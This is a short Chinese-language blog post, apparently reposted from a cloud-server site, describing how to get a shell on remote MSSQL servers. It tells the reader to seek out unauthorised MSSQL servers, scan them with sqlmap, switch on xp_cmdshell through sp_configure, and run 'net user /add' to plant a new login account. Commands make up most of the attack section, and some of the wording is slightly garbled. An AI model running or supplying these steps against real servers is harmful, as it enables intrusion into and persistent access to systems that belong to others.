MSSQL远程渗透获得shell技能
MSSQL远程渗透是一种技术,它能让我们通过某种漏洞获得系统权限并获得shell,它也能够通过一系列的技术的利用实现。
下面,我们来介绍MSSQL远程渗透获得shell的技能。
首先,我们需要找到一些未授权的MSSQL远程服务器。然后连接到远程服务器,首先要使用SQLMap来审计渗透目标服务器,检查出存在的漏洞。例如,可使用以下命令:
sqlmap -u [Target URL] –dbs:
其次,经过SQLMap的审计,下一步就是检查MSSQL服务器中会不会存在xp_cmdshell这类存储进程。这是一种允许履行任意命令和系统命令的进程,由于xp_cmdshell是默许情况下不可用的,所以要将它激活,可使用以下代码:
EXEC sp_configure ‘show advanced options’, 1
GO
RECONFIGURE
GO
EXEC sp_configure ‘xp_cmdshell’, 1
GO
RECONFIGURE
GO
最后,使用xp_cmdshell来履行远程命令并获得shell。可以履行以下命令:
exec master..xp_cmdshell ‘net user /add [username] [password]’
如果成功,登录远程服务器就会用刚刚设置的用户名和密码。
通过以上步骤,可以获得到MSSQL远程服务器上的shell。在渗透技术中,获得shell是一个非常重要的一步,以上技能可以帮助渗透测试人员轻松获得shell。
本文来源:https://www.yuntue.com/post/197895.html | 云服务器网,转载请注明出处!
微信扫一扫打赏
支付宝扫一扫打赏
